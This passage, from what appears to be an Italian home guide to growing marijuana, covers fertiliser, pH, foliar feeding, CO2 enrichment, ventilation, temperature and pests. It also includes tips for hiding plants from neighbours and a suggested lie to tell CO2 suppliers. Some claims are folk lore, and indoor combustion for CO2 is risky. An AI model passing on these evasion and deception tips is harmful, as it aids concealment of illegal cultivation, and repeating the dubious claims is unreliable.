arrestando lo sviluppo della pianta. Usala con estrema moderazione, lasciala gonfiarsi per 
almeno un'ora prima di mescolarla con altro concime.
La dimensione della pianta nella terra  direttamente proporzionale alla dimensione del vaso.
 Se vuoi che la pianta cresca pi grande, mettila in un vaso pi grande. Di solito, un vaso 
da 2 litri per una pianta da 30 cm  sufficiente. Una pianta di 2 metri richiederebbe un vaso 
da almeno 10 litri di volume. Ricorda che i recipienti quadrati hanno un volume maggiore in 
uno spazio quadrato o rettangolare (come un ripostiglio).
Piantare nel terreno  sempre preferibile quando fai uso di concimi. Le piante possono 
crescere quindi liberamente, senza le restrizioni imposte dalle dimensioni del vaso.
Guano di pipistrello, escrementi di pollo o di vermi possono tutti essere impiegati per 
fertilizzare organicamente il terreno. I concimi possono bruciare, cos prima dovrebbero 
essere ridotti in concime organico con della terra, prima di piantare, per diverse settimane. 
Si possono utilizzare anche alghe marine per fornire un ricco apporto di minerali in tracce, 
visto che si decompongono lentamente e nutrono quindi con continuit le piante.
Se coltivi all'aperto con buona disponibilit di terra, guarda se nei paraggi ci sono foglie
 ed altre fonti naturali di azoto ed aggiungile al terreno, insieme con con alcune "dolomite 
lime" e fertilizzanti ridotti in concime organico. Anche una piccola quantit di nutrimenti 
per piante come il Miracle Grow pu essere ugualmente aggiunta al terreno. (I coltivatori 
organici aggrottano le ciglia per questa pratica, comunque. La lavorazione di fertilizzanti 
commerciali produce infatti rifiuti tossici.) Puoi ottenere un buon concime naturale dalle 
foglie; spargi il fogliame sull'area di coltivazione per mantenerla umida e limita le erbacce
vicino alle piante.


SOTTERFUGIO


E' interessante notare che le piante di marijuana possono realmente essere mescolate tra le 
altre piante al punto da non essere identificabili da tutti ma soltanto dagli osservatori pi 
accorti. Ricordo che un mio parente durante una visita in Texas mi mostr il suo mais nell'
orto e mi accorsi delle numerose piante di maria soltanto quando mi trovai a meno di un metro 
da loro.
Le piante seminate all'aperto in tarda stagione non diventano mai troppo grandi e non danno
 mai nell'occhio quando vengono sistemate vicino a piante simili o di dimensioni maggiori. 
Le piante di dimensioni simili coltivate in mezzo a tanti alberi risulteranno pressoch 
invisibili nel loro camuffamento.
All'aperto il compito  quello di controllare l'accesso all'area per non destare sospetti. 
Nascondile di qua e di l a casaccio, mai secondo uno schema riconoscibile. Distanziale tra 
di loro, e distribuiscile sul suolo disponibile in modo che siano costantemente illuminate 
dal sole, pur essendo nascoste o mescolate. Le reti di recinzione e gruppi di diverse piante 
messe insieme sono la cosa migliore. Cerca di trovare un tipo di pianta che si armonizzi con 
le piante circostanti. Somministra azoto alle tue piante se c' bisogno che siano pi verdi 
per meglio confondersi tra le altre. Alcuni coltivatori usano perfino fiori di plastica rossi,
 attaccati alla pianta, camuffandola come un cespuglio di fiori.
Visita le piante di notte con la luna piena, e se sei visibile ai vicini, fai finta di potare 
un albero, di falciare il prato, o fai qualcosa nel cortile che ti renda inosservato.
Scava un buco e infilaci il vaso con la pianta. L'altezza della pianta sar ridotta di almeno 
30 centimetri. 
Alcuni coltivatori spuntano la pianta quando  pi alta di 30 cm, e crescono le due parti 
orizzontalmente con un graticcio. La pianta non sar mai pi alta di un metro, e non 
insospettir in alcun modo i vicini rompipalle. Questo tipo di pianta pu essere coltivata 
anche nel tuo cortile in piena vista.


NUTRIMENTI 


I nutrimenti per piante hanno tre elementi notevoli che si riveleranno il principale sostegno 
del tuo giardino: Azoto, Fosforo e Potassio Questi 3 ingredienti di solito sono elencati sull'
etichetta frontale della confezione del nutrimento per piante nell'ordine di N-P-K (Nitrogen, 
Phosphorus, Potassium). Un nutrimento per piante 20-20-20 ha una concentrazione di azoto del 
20%.
I nutrimenti secondari sono Calcio, Zolfo e Magnesio. Quantit in tracce di boro, rame, 
molibdeno, zinco, ferro e manganese. 
A seconda dello stadio di crescita, diversi nutrimenti sono richiesti in momenti differenti. 
Per lo sviluppo delle radici e la germinazione, sono richiesti nutrimenti con alte 
concentrazioni di fosforo (high P) e basse concentrazioni di azoto e potassio. La crescita 
vegetativa ha bisogno di molto azoto, e l'orina umana  una delle migliori fonti, (miscela 
250 millilitri di piscio per circa 4 litri d'acqua), anche se non  un fertilizzante completo 
di per se stesso. 20-20-20 con elementi in tracce dovrebbe renderlo tale; trovo molto valido 
il Miracle Grow Patio. Curati anche del livello di calcio, magnesio, zolfo e ferro. Questi 
sono importanti. Un cucchiaio da cucina di dolomite calcarea o idrato di calcio  usato in 4 
litri di soluzione per la crescita quando un ambiente idroponico  inizialmente portato 
avanti, per fornire azoto, calcio e magnesio. Il sale inglese viene impiegato per migliorare 
i livelli di magnesio e zolfo nella soluzione. 
Il tabacco cresciuto con nitrato di potassio brucia meglio. Alimenti per piante con PN, 
fosforo e azoto, (P2N3) sono nutrimenti del tipo Miracle Grow. Questo  un fertilizzante 
eccellente per la crescita vegetativa, o anche durante il ciclo della fioritura. Considera 
comunque che il nitrato di potassio  anche noto come Salt Peter, ed  usato per quegli 
uomini cui viene meno il desiderio sessuale o sono impotenti, o anche nei manicomi. Cos se 
alcune di queste sono destinate alla cottura, potresti usare emulsioni di pesce o altri 
fertilizzanti completamente organici su queste piante, almeno nelle ultime settimane di 
fioritura.
La maggior parte delle soluzioni idroponiche dovrebbero essere nell'intervallo di 150-600 
parti per milione in alimenti solidi disciolti. 300-400 ppm  il valore ottimale. E' possibile 
testare la tua soluzione o concime con un misuratore della conducibilit elettrica se non sei 
sicuro di ci che somministri alle tue piante. 
Tieni presente che la maggior parte dei valori degli alimenti solidi disciolti sono di solito 
sul lato basso, e i livelli dei nutrimenti effettivi notevolmente pi in alto. E' possibile 
con colture idroponiche passive, ottenere un incremento dei nutrimenti dopo diverse 
concimazioni, al punto che l'ambiente idroponico  completamente saturo di nutrimenti. 
Alimenta la pianta semplicemente con acqua pura di quando in quando, fino a quando noti 
che le piante non sono tanto verdi, e quindi riprendi con l'alimentazione tradizionale. 
Il "pompaggio" si verifica quando usi pi innaffiamenti per far crescere le piante pi 
velocemente. Questo pu essere rischioso se procedi in maniera imprudente, a causa dei 
problemi di sovrainnaffiamento potenziale. Deve andarci piano e visionare le piante 
quotidianamente e inizialmente ogni ora, per essere sicuro di non innaffiare a dismisura le 
piante. Usa miscele di nutrimenti per piante pi povere del normale, diciamo un 25%, ed 
assicurati di filtrarle una volta al mese e di fornire acqua pura alle piante almeno in ogni 
occasione in cui annaffi. Questo vale specialmente per le piante coltivate in un ambiente a 
base di terra.  L'uso di nutrimenti per piante Oxygen Plus a bassa concentrazione (o un 
alimento a base di perossido di idrogeno) permette alle radici di respirare meglio e previene 
i problemi di sovrainnaffiamento. Controlla il terreno per essere sicuro che non ci sia 
alcuna anomalia nel PH che potrebbe essere dovuta al perossido di idrogeno nella soluzione.  
(Un coltivatore esperto mi ha detto che non usa H2O2 (HP) a causa dei possibili problemi di PH.
 Questo non dovrebbe essere un problema se tieni d'occhio il PH e lo correggi nelle soluzioni 
dell'innaffiamento.)
Assicurati che il tuo ambiente abbia un buon drenaggio. A questo punto se innaffi le piante 
sistemate nel terreno una volta alla settimana, puoi innaffiare ogni 3-5 giorni invece di 
piantarle in un ambiente con un miglior drenaggio. La perlite o la lava aumenteranno 
enormemente il drenaggio dell'ambiente e renderanno necessario un innaffiamento pi 
frequente. Questo pomper le piante; queste tenderanno a crescere pi velocemente a
causa del migliorato apporto di ossigeno alle radici. Assicurati che l'habitat della pianta 
sia asciutto prima di un nuovo innaffiamento, in questo modo la pianta cresca pi velocemente.
Un'alternativa  usare una mistura di nutrimenti per piante standard (pi forti) una volta 
ogni 3 innaffiamenti. I nutrimenti vengono trattenuti nell'ambiente ed immagazzinati nel 
suolo per un uso successivo. I nutrimenti vengono lavati via con 2 innaffiamenti consecutivi 
dopo e non si verifica l'accumulo di sali nel suolo (non applicarlo alle colture idroponiche).
Smetti di nutrire le piante 2 settimane prima del raccolto, in modo che le piante non abbiano 
il sapore del fertilizzante.  (Questo vale anche per le colture idroponiche.) 
AVVERTIMENTO: Non sovrafertilizzare. Far morire le tue piante. Leggi sempre le istruzioni del 
fertilizzante che devi impiegare. Usa una quantit dimezzata se lo aggiungi all'acqua per ogni 
nutrimento in terra o in ambiente idroponico, se non sei sicuro di ci che le tue piante 
possono assimilare. Passa gradatamente a concentrazioni pi elevate di nutrimenti per tutto 
il tempo. I coltivatori novizi tendono a sovrafertilizzare le loro piante. I sali minerali si 
accumulano con il tempo a livelli pi alti di nutrimenti disciolti. Usa acqua pura per 
alimentare le colture idroponiche se ritieni che la concentrazione sia troppo elevata. Filtra 
le piante che stanno nei vasi ogni mese. Se le tue piante sembrano divenire veramente verdi, 
non somministrare sostanze nutritive per un bel pezzo per accertarti che non siano 
sovraalimentate.


PH E FERTILIZZANTI 


I PH pu fare o disfare la tua soluzione nutritiva. Valori compresi tra 6.7-6.2 sono i pi 
indicati per assicurare che non si verifichi alcun blocco dei nutrimenti. Le colture 
idroponiche richiedono una soluzione con PH corretto prima di metterle a contatto delle 
piante. L'acido fosforico pu abbassare il livello di PH; la calce o la potassa (carbonato 
di potassio) possono alzarlo quando diventa troppo acido. Acquista un misuratore di PH per 
10 dollari ed usalo nel terreno, nell'acqua, e nell'ambiente idroponico per accertarti che 
con il passare del tempo non diventi alcalino o acido. Per ambienti molto neutrali puoi 
usare un po' di aceto per portarlo da un valore di pH 7 a 6.5 o gi di l.
La maggior parte dei fertilizzanti causa un cambiamento di pH nel suolo. Aggiungendo 
fertilizzante al terreno quasi sempre si ha come conseguenza un pH pi acido.
Con il passare del tempo, l'accumulo di sali prodotti dalla scomposizione dei fertilizzanti 
nel suolo provoca un incremento progressivo dell'acidit del suolo ed alla fine la 
concentrazione di questi sali nel suolo arrester lo sviluppo della pianta e causer 
un oscuramento delle foglie. Inoltre, quando la pianta invecchia le sue radici diventano 
meno efficienti nel portare nutrimenti alle foglie. Per evitare l'accumulo di questi sali 
nella terra ed assicurare che la tua pianta assimili tutte le sostanze nutritive di cui ha 
bisogno puoi iniziare a nutrire le foglie della pianta quando ha raggiunto il mese e mezzo 
di vita. Disciogli il fertilizzante in acqua calda e spruzza la mistura direttamente sulle 
foglie. Le foglie assorbono il fertilizzante nelle loro nervature. Se vuoi continuare a 
mettere il fertilizzante anche nel suolo per nutrire le foglie, assicurati di non 
somministrare alle piante un'overdose di sostanze nutritive.



NUTRIMENTO DELLE FOGLIE 

Il nutrimento delle foglie sembra essere una delle vie pi facili per incrementare il 
raccolto, per velocizzare la crescita e la qualit in uno spazio ben ventilato, con o 
senza elevati livelli di CO2. Prepara semplicemente un infuso con escrementi di vermi, 
emulsioni di pesce, guano di pipistrello, o con molti altri nutrimenti per piante indicati 
per il fabbisogno alimentare durante gli stadi vegetativi e di prima fioritura. Non  
raccomandato per la tarda fioritura, o sprecherai il materiale spruzzato tardi. Smetti di 
nutrire le foglie 2-3 settimane prima del raccolto. Lava le foglie con acqua pura ogni 
settimana per prevenire l'ostruzione degli stomi delle foglie. Cibale quotidianamente.
Il miglior momento del giorno per nutrire le foglie  dalle 7 alle 10 del mattino e dopo le 
5 del pomeriggio. Questo perch gli stomi nella parte inferiore delle foglie sono ancora 
aperti. Inoltre, la temperatura ideale  di 22 gradi, e sopra i 25 non possono essere 
affatto aperti. Cos trovati la parte pi fresca della giornata, se fa caldo, e la parte 
pi calda se fuori fa freddo. Pu essere che tu debba spruzzare le foglie alle due del 
mattino se  quella la parte del giorno pi fresca. Lo spruzzatore usato deve atomizzare 
la soluzione in una nebbiolina molto fitta; tira fuori il tuo miglior spruzzatore ed usalo 
per questo scopo. Accertati che il PH sia tra 7 e 6.2. Usa bicarbonato di sodio per aumentare 
il PH della soluzione, ed aceto per diminuirlo. E' meglio spruzzare pi spesso ed usarne meno 
per volta, che infradiciare le piante una volta ogni tanto. Usa un agente imbibente per 
prevenire la formazione di grosse gocce d'acqua, e di conseguenza che le foglie non si 
brucino come sotto l'azione di piccoli prismi riflettenti. Stai attento a non spruzzare 
su una lampadina accesa; meglio ancora, spruzza solo quando le lampadine si sono raffreddate 
(se bagni infatti una lampadina da troppe ore accesa e quindi molto calda, potrebbe scoppiare 
a contatto con una sostanza di gran lunga pi fredda).
Forse il miglior nutrimento per le foglie comprende l'uso di acqua di seltz e cibo per piante 
contemporaneamente. Cos facendo, la CO2 e i nutrimenti sono forniti direttamente alle foglie 
con una sola spruzzata.
Il nutrimento delle foglie  riconosciuto nella maggior parte dei testi specializzati come il 
metodo migliore per cibare una pianta una volta che i problemi di blocco delle sostanze 
nutrienti hanno iniziato a ridurre la capacit di assorbimento dalle radici.
AVVERTIMENTO!:  importante lavare le foglie che devono essere raccolte prima che si siano 
asciugate, se intendi mangiarle, dal momento che possono avere nitrati su di loro. 
NOTA: Un coltivatore che ha letto questo documento ha commentato:  "Le emulsioni di pesce 
puzzano. Il guano di pipistrello potrebbe essere molto antigienico. Tienti stretto il 
Rapid-Gro, il MgSO4 (sale inglese), la soluzione idroponica con elementi in tracce. I 
sali nitrati (l'"N" in NPK) non sono molto sani da fumare. Personalmente, io non nutro 
mai le foglie."
Al di l di questo assennato commento, c' molta saggezza nel mantenere organico, non 
tossico, un giardino. Personalmente, uso solo CO2 sulle mie piante idroponiche al coperto, 
e non nutro mai le foglie. Semplicemente non  necessario quando usi colture idroponiche.


ANIDRIDE CARBONICA


Elevati valori di anidride carbonica possono aumentare considerevolmente la velocit di 
accrescimento, fino quasi a raddoppiarla. Pare che le piante si siano evolute nei periodi 
primordiali in cui i livelli naturali di CO2 erano molto pi elevati di quelli odierni. La 
pianta si serve della CO2 nella fotosintesi per produrre zuccheri che usa per costruirsi i 
tessuti. Aumentare i livelli di CO2 significa aumentare la capacit delle piante di produrre 
questi zuccheri e il tasso di crescita della pianta viene considerevolmente incrementato.
Produrre CO2 in sicurezza, a buon mercato e/o con convenienza pu essere una pena, ed  
difficile da allestire. La CO2  molto utile per la fioritura, quando la pianta  molto densa 
ed attraversa il momento pi critico per quanto concerne la circolazione dell'aria nelle 
foglie. Se tu coltivi durante la fase vegetativa rigorosamente al coperto, (portando poi le 
tue piante all'aperto per la fioritura), allora la CO2 non sar un fattore determinante a 
meno che tu non abbia una serra sigillata, un ripostiglio, uno sgabuzzino o una camera da 
letto, e desideri aumentare la produzione e ridurre il tempo di fioritura.
Per una operazione al coperto di medie dimensioni un approccio  quello di usare contenitori 
di plastica di CO2 presi dai fornitori a domicilio. Questo inizialmente ha un certo costo, ma
relativamente poco costoso sul lungo periodo. Questi sistemi sono indicati solo se la tua area 
non  n troppo grande n troppo piccola.
Il sistema di base a taniche di CO2  di questo tipo:
Contenitore da 10 kg 100 dollari; Regolatore 159 dollari; Timer o regolatore 10-125 dollari; 
Il pieno di CO2 15-20 dollari

Caso peggiore: 395 dollari per l'installazione di un contenitore di CO2 sincronizzato ad un 
aspiratore da un termostato. 
Si pu produrre a basso costo CO2 bruciando gas metano. Comunque, il calore e il monossido di 
carbonio devono avere uno sfogo all'aria aperta. Si pu ottenere CO2 acquistando o noleggiando 
bombole dai locali fornitori a domicilio. Se ti fanno domande, puoi dire di possedere un 
vecchio saldatore a casa che ti serve per aggiustare il tagliaerba (rimorchio, macchina, 
ecc...) 
Per un piccolo sgabuzzino, un serbatoio potrebbe durare 2 mesi, ma dipende da quanto gas 
rilascia, da quanto la stanza  ventilata, ore di ciclo di luce, fessure nella stanza, 
livelli di arricchimento e metodi di dispersione. Questo metodo pu risultare fatale per 
il tuo piccolo ambiente.
E' visto generalmente di buon occhio avere un piccolo flusso costante di CO2 sulle piante 
durante tutto il tempo in cui la luce  accesa, diffusa direttamente sopra le piante durante 
il tempo i cui i ventilatori sono spenti.
Ci sono dei sistemi per conservare la CO2, ma questi possono costare un bel gruzzoletto. 
Quando la luce  spenta non c' bisogno di CO2, cos durante la fase della fioritura, ne 
userai la met come se avessi il solenoide della CO2 collegato al timer della luce. Quando 
il ventilatore  acceso per il ricircolo, allora la CO2 viene interrotta. Questo pu essere 
praticato per met del tempo in cui la luce  accesa, in modo da incidere sui tempi di 
esposizione delle piante e sulla quantit di gas che realmente bisogna impiegare.
In un ambiente chiuso, usare bombole di gas  la cosa migliore, dal momento che la produzione 
si somma all'effetto serra, e anche la CO2 in bombola viene catturata come parte del processo
 produttivo di molti materiali, e quindi riciclata. Fermentando, i generatori di CO2, e i 
metodi del bicarbonato di sodio e dell'aceto producono tutti nuova CO2 che incrementa 
l'effetto serra.
E' possibile la creazione di CO2 dalla fermentazione e dai generatori. Un semplice generatore 
di CO2 potrebbe essere una stufa alimentata a propano. Questo funzioner bene, per tutto il 
tempo in cui i gas potranno diffondersi nell'area di coltivazione, ed un ventilatore verr 
impiegato per tenere in circolo la CO2 calda (che sale) e disponibile in basso al livello 
delle piante. Il fuoco e gli scarichi prodotti dalla stufa costituiscono anche un problema. 
Una stanza che deve essere ventilata per il 50% del tempo per liberare l'ambiente dal calore
 di una lampada e della stufa non ricever tanta CO2 quanta una stanza che pu essere 
lasciata senza ventilazione per diverse ore alla volta. Comunque, i generatori di CO2 sono 
l'unica strada da prendere per operazioni su larga scala.
La fermentazione o l'aceto sul bicarbonato di sodio funzioneranno se non avrai molti cicli di 
ventilazione, ma se hai abbastanza calore da costringerti a fare costanti o regolari 
ventilazioni, questi metodi non risulteranno pi pratici. Soltanto versa l'aceto sul 
bicarbonato di sodio e chiudi la porta, (perdi la tua CO2 tanto presto quanto pi ventili 
l'area). Questo metodo lascia molto a desiderare, visto che non  facile regolarlo 
automaticamente, e richiede un'attenzione quotidiana. E' possibile comunque creare CO2 
dalla fermentazione, lascia il vino diventare aceto, e versalo sul bicarbonato di sodio.
E' il sistema pi conveniente sotto il profilo economico per la maggior parte dei coltivatori 
da sgabuzzino, per i quali 400 dollari nel mettere in piedi la produzione di CO2 sono davvero 
una mazzata.
Durante la fermentazione, il fermento continuamente si autoelimina; occupa molto spazio. Hai 
bisogno di un bidone capiente per aggiungere costantemente acqua, in modo che i livelli
dell'alcol non si alzino quanto basta per eliminare il fermento. Lo zucchero viene impiegato 
per raggiungere velocemente questo scopo, ed un sacco da 5 Kg coster 3,50 dollari o gi di l 
al massimo in 2-3 settimane circa. E' anche difficile stimare cosa accade a lungo andare e a 
quanto ammonta realmente la produzione Un tubo che fuoriesce dalla cima e arriva in una 
vaschetta d'acqua former bolle e dimostrer che si  verificata una produzione di CO2.
Prova il bicarbonato di sodio mescolato con aceto, 1 cucchiaino: circa 30 cc. Questo reagir 
provocando bollicine e gorgoglii quando liberi la CO2. Fallo solamente quando hai chiuso la 
porta che d sulle tue piante. Una via MOLTO pi conveniente per procurarsi CO2 si basa su 
50 grammi di zucchero in una bottiglia da 2 litri di acqua (sterilizzata la prima volta con 
candeggina ed acqua, quindi risciacquata), pi alcuni centilitri di piscio (!) o, se insisti, 
fermenti nutritivi presi da un semplice fornitore di birre a domicilio. Aggiungi i fermenti di 
birra, sbatti bene e mantienilo a 25 gradi. Passate 2 settimane o gi di l produrr circa 15 
grammi di CO2 per ogni 30 grammi di zucchero impiegati. Guadagnerai un po' per volta, 
iniziando uno nuovo ogni 3 giorni o gi di l. Con l'aggiunta di CO2 la crescita  
fenomenale!!! Ho misurato di persona una crescita di 38 cm in 8 giorni sotto una lampadina 
HPS da 250 watt (con tubolari luminosi, a fissaggio orizzontale).
Un buon contenitore  un bricco in plastica di latte da 4 litri, con un beccuccio sul tappo. 
Inoltre, la chiusura del passaggio di aria da una parte del tubo luminoso acceso nel bricco 
riempito con acqua tiene lontani i batteri e dimostra che la fermentazione  in atto.
Una variazione possibile  quella di spruzzare acqua di seltz sulle piante due volte al 
giorno. Alcune celebrit del settore per non lo raccomandano, ricevendo di conseguenza 
incredibili cazziatoni da parte di chi, una volta provato, ha riscontrato dei miglioramenti 
nel raccolto. E' ovvio che ognuno vorrebbe adoperarsi solamente per un piccolo sgabuzzino 
non ventilato, ma potrebbe andare bene solo in alcuni casi. Potrebbe risultare oneroso con 
molte piante da spruzzare. Usa acqua di seltz, non bicarbonato di sodio in barrette, dal 
momento che contiene pi sodio che potrebbe ostruire gli stomi delle piante. Lava le tue 
piante con acqua pura dopo 2 o 3 spruzzate di seltz. C' molto lavoro, e non puoi 
automatizzarlo, ma forse  un bene! Ricorda, stare con le piante  una bellissima esperienza, 
e ti avvicina alla tua spiritualit e alla terra. L'acqua di seltz viene venduta nella 
maggior parte dei negozi di generi alimentari (Io l'ho comprata al Lucky's a 0.79 dollari 
per una bottiglia da 2 litri). Il bicarbonato di sodio in tavolette andr bene lo stesso 
se proprio non hai acqua di seltz, ma ha il doppio del sodio rispetto all'acqua di seltz. 
Una soluzione veramente diluita di Miracle Grow pu essere spruzzata sulla pianta insieme 
all'altra. Una delle caratteristiche dell'uso di acqua di seltz  che incrementa i livelli 
di umidit. Assicurati di ventilare l'ambiente umido durante il ciclo di buio, o potresti 
rischiare la formazione di funghi ed un aumento eccessivo della lunghezza degli internodi.
ATTENZIONE: Non spruzzare troppo vicino ad una lampadina calda! Spruzza solo verso il basso, 
oppure prima spegni la luce.
Anche se l'arricchimento con la CO2 pu significare un incremento della produzione 
del 30-100%, la scocciatura, il costo, lo spazio, il pericolo ed il tempo impiegato 
possono rendere una ventilazione costante o molto costante un'alternativa molto invitante 
all'arricchimento. Finch la pianta ha l'opportunit di assimilare nuova CO2 di continuo, 
da aria che ha oltre 200 parti per milione di CO2, le piante avranno tutti i nutrimenti 
indispensabili per la fotosintesi. La maggior parte degli sgabuzzini avr bisogno di un 
ricambio di nuova CO2 ogni due o tre ore, perlomeno. Quasi tutte le citt hanno 
concentrazioni molto elevate di CO2 nell'aria, ed alcuni coltivatori trovano che iniezioni 
di CO2 in circostanze simili non sono necessarie.
Alcuni coltivatori hanno scritto su High Times che elevate concentrazioni di CO2 nella stanza 
dedicata alla coltivazione in prossimit del periodo del raccolto diminuiscono la potenza del
 fumo. Pu essere una buona idea terminare la somministrazione di CO2 due settimane prima del 
raccolto.



VENTILAZIONE 

Devi ventilare molto se usi una lampada HID, meno per quelle a fluorescenza. Inoltre, la 
produzione di umidit richiede almeno una ventilazione di pochi minuti al giorno. Per una 
stanza con una lampada calda che produce calore rapidamente, la miglior ventilazione sarebbe 
una che libera la stanza in 5 minuti, quindi uno stop di 25 minuti prima di eseguire una nuova 
ventilazione, o allo stesso modo, una ventilazione di 3 minuti con 12 minuti di pausa e via di 
seguito. Il trucco sta nel trovare un timer che svolger questo compito. Non  facile da 
reperire e non  economico. Una volta che hai bisogno di regolare acceso/spento e viceversa 
la CO2 con il ventilatore, fai un pensierino ad un regolatore climatico per circa 100 dollari. 
Alternative possono essere un termostato che accende un ventilatore quando si  raggiunta una 
data temperatura, e lo spegne quando la temperatura scende di 4 gradi. Ma  una pizza 
coordinare la diffusione di CO2 con questo, dal momento che non sai quando il ventilatore 
si accende. 39 dollari per un termostato del genere, ma sincronizzarlo alla CO2 con un rel 
a rivelazione di voltaggio costa 100 dollari per l'interruttore bell'e pronto, cos in 
sostanza il controllore ambientale a 100 dollari  pi conveniente. Tutto ci di cui hai 
realmente bisogno  un ventilatore che purifica l'aria in pochi minuti, un commutatore di 
temperatura che accende e spegne il ventilatore, ed un interruttore inverso che disattiva 
e attiva la produzione di CO2. Se puoi ventilare la stanza veramente in poco tempo ed il 
calore non si produce troppo in fretta, la CO2 pu essere diffusa in maniera lenta, continua, 
e potrebbe essere prodotta tra i periodici e rapidi cicli di ricambio dell'aria. 
Si possono usare due timer sincronizzati, ma il solo sistema a buon mercato disponibile  
l'intervallo di 30 minuti, dunque 48 scatti per 24 ore. In questo modo io posso avere un 
ventilatore che gira per 30 minuti, quindi spento per altri 30. Posso anche sincronizzarlo 
alla luce in modo da non dover essere costretto a ventilare quando la lampada  spenta. 
Posso sincronizzarlo ad un identico timer che attiver la CO2 durante il tempo in cui il 
ventilatore non  acceso, e viceversa. Sarebbe difficile sincronizzarli a meno di 5-10 
minuti, ma almeno ci sarebbe una soluzione possibile e poco costosa. 20 dollari per due 
di questi timer. 
Comprare ventilatori per far circolare l'aria  costoso, ma io mi sono semplicemente recato 
da liquidatori locali di componenti elettronici che avevano ventole d'occasione per 5-10 
dollari, e cos sono riuscito ad ottenere un risparmio effettivo di 50-70 dollari rispetto 
al prezzo di ventilatori nuovi in un negozio di articoli per giardinaggio. Un buon 
ventilatore manterr l'umidit e la temperatura a valori bassi, e diffonder la CO2 
alle tue piante con l'apporto di nuova aria.
Anche la circolazione interna dell'aria  realmente indispensabile. Si dovrebbe usare un 
ventilatore basculante per far circolare l'aria all'interno della stanza di coltivazione, 
per aiutare il ricircolo della CO2. In pi manterr bassa l'umidit, permettendo all'aria di 
assorbire pi umidit, riducendo cos il rischio di funghi. Un ventilatore a muro non porter
via spazio prezioso dal pavimento. Le migliori stanze di coltivazione hanno la massima 
circolazione dell'aria all'interno.



TEMPERATURA

La temperatura adatta  uno dei fattori maggiormente variabili. La maggior parte dei libri 
stabilisce che la temperatura ottimale per la crescita  di 20-25 gradi, ma c' una lunga 
lista di circostanze attenuanti che provocano un aumento della temperatura. Assumere 
modificazioni genetiche non sembra essere un fattore, le piante sembrano potere assorbire 
pi luce a temperature pi elevate, forse fino a 30 gradi o poco pi. Alti livelli di luce 
e di CO2 potrebbero spingere la temperatura a 35 gradi per incrementare la velocit di 
accrescimento (consulta: D. Gold: 'CO2, Temperature and Humidity', 1991 - Casa editrice E. 
Rosenthal).
Una condizione ideale di 35 gradi  data da una luminosit molto intensa, un arricchimento 
di CO2 dell'ordine di 1500 parti per milione e una buona ventilazione costante per mantenere 
bassa l'umidit. Non  chiaro se questa temperatura ridurr la potenza nei fiori. Pu essere
una buona idea ridurre la temperatura una volta che  cominciata la fase della fioritura, per 
mantenere la potenza del fumo, anche se riduce la velocit di accrescimento. Ma temperature 
pi alte aumenteranno considerevolmente la velocit di crescita vegetativa della pianta, 
stimolandone il metabolismo, assumendo i livelli richiesti di CO2 e la luce disponibile, e 
impediranno un aumento dell'umidit.
Con livelli normali di CO2, in uno spazio ben ventilato, 32 gradi sembrerebbero essere la 
temperatura massima consentita, mentre 30 gradi possono avvicinarsi maggiormente alle 
condizioni ideali, anche con molta luce a disposizione. Non lasciare la temperatura della 
stanza andare oltre i 35 C perch potrebbe incidere negativamente sullo sviluppo della 
pianta. La temperatura ottimale  tra i 27 e i 30 gradi se hai una luce intensa senza 
arricchimento di CO2. Meno di 21 C  troppo freddo per una crescita corretta.
Le basse temperature di notte sono OK sotto i 15 gradi all'aperto, quindi comincia ad 
effettuare la crescita in grande stile. Una temperatura media intorno ai 10 gradi causer 
un leggero shock e una attorno ai 4 gradi medi uccider le tue piante con una ripetuta 
esposizione. Tieni le tue piante al caldo, specialmente le radici. Alza i vasi se ti sembra 
che il terreno assorba il calore dalle radici. Questo pu essere un problema se hai una 
lastra o un altro tipo di pavimento freddo.
Come la temperatura sale, cos aumenta la capacit dell'aria di trattenere acqua, quindi si 
riduce l'umidit, e pertanto una temperatura media pi alta dovrebbe ridurre il rischio di 
funghi.
In contrasto con molti rapporti, un alto tasso di umidit non  indicato per le piante 
eccetto durante la germinazione e la formazione delle radici. Una umidit pi bassa aiuta 
la pianta a traspirare CO2 riducendo in questo modo il rischio di muffa durante la fioritura.
Alcuni studi indicano che la potenza delle gemme scema quando la temperatura sale, cos  
importante stare attenti che le piante non ricevano troppo caldo durante i cicli della 
fioritura.



PARASSITI 

Devi realmente guardarti dai parassiti, o tutti i tuoi sforzi potrebbero avere come 
conseguenza un minimo ritorno o, al peggio, la perdita di tutta la produzione. Acari e 
afidi sono i peggiori; mosche bianche, bruchi e funghi sono gli unici da tenere d'occhio a 
lungo termine. Un bombardamento di piretro pu ripulire da zero la stanza, e quindi spruzzi 
di sapone fatto in casa o commerciale faranno il resto. Quando porti dentro le piante 
dall'esterno, spargi il piretro su ogni singola foglia in alto e in basso e anche sulla 
terra. Quindi ispezionale minuziosamente per una settimana o due, e insapona ogni residuo 
di vita degli insetti che trovi fin dalle uova che li hanno fatti nascere. Dovresti fare 
questo trucco per un mese o due, un periodo lungo a sufficienza per non avere problemi in 
vista del raccolto.
I funghi sono un ulteriore ostacolo sulla via di una strepitosa stagione di raccolto. Quando 
i fiori sono all'incirca a met dello sviluppo divengono soggetti a funghi o alla 
decomposizione delle gemme. Sembra che le condizioni di crescita dei funghi siano migliori 
quando la temperatura  tra i 15 e i 25 gradi e l'umidit  alta. I funghi sono molto 
distruttivi e si diffondono rapidamente. C' un tipo di spora di fungo che raggiunge le 
altre gemme tramite il vento cos  impossibile prevenirla o fermarla se le condizioni del 
tempo ne consentono lo sviluppo. Se le cose dovessero mettersi male e i funghi iniziassero 
ad intaccare le tue piante, devi rimuoverli immediatamente o si diffonderanno nelle altre 
aree della pianta o in altre piante.
Alcuni coltivatori rimuovono soltanto la porzione di gemma infettata mentre altri rimuovono 
l'intero ramo. La rimozione del ramo intero assicura maggiormente che il fungo sia totalmente 
rimosso, e in pi consente al coltivatore di assaggiare il raccolto con alcune settimane di 
anticipo.
I funghi possono prosciugare il tuo raccolto rapidamente, quindi investi in alcuni fungicidi 
sicuri e spruzzali sulle piante solo prima della fioritura se pensi che i funghi possono 
crearti un problema. Non spruzzarli sulle piante se non mai ha avuto problemi prima con i 
funghi. Mantieni basso il livello di umidit, fai circolare l'aria come un pazzo sull'area 
di coltivazione e tieni le piante all'aperto che non sono state in quarantena lontano da 
quelle all'interno. Non aspettare fino a dopo la fioritura, dal momento che non  una buona 
idea applicare il fungicida direttamente sui fiori. Invece, i fiori devono essere tagliati 
quando sono infetti.
La maggior parte dei fungicidi ha un odore sgradevole, e tu non vorrai certamente ingerirli 
o fumarli, cos  necessario usarne uno che sia sicuro per i vegetali. Ancora meglio: 
procurati prodotti adeguati, di quelli che trovi nelle serre; contengono solo zolfo in 
soluzione.
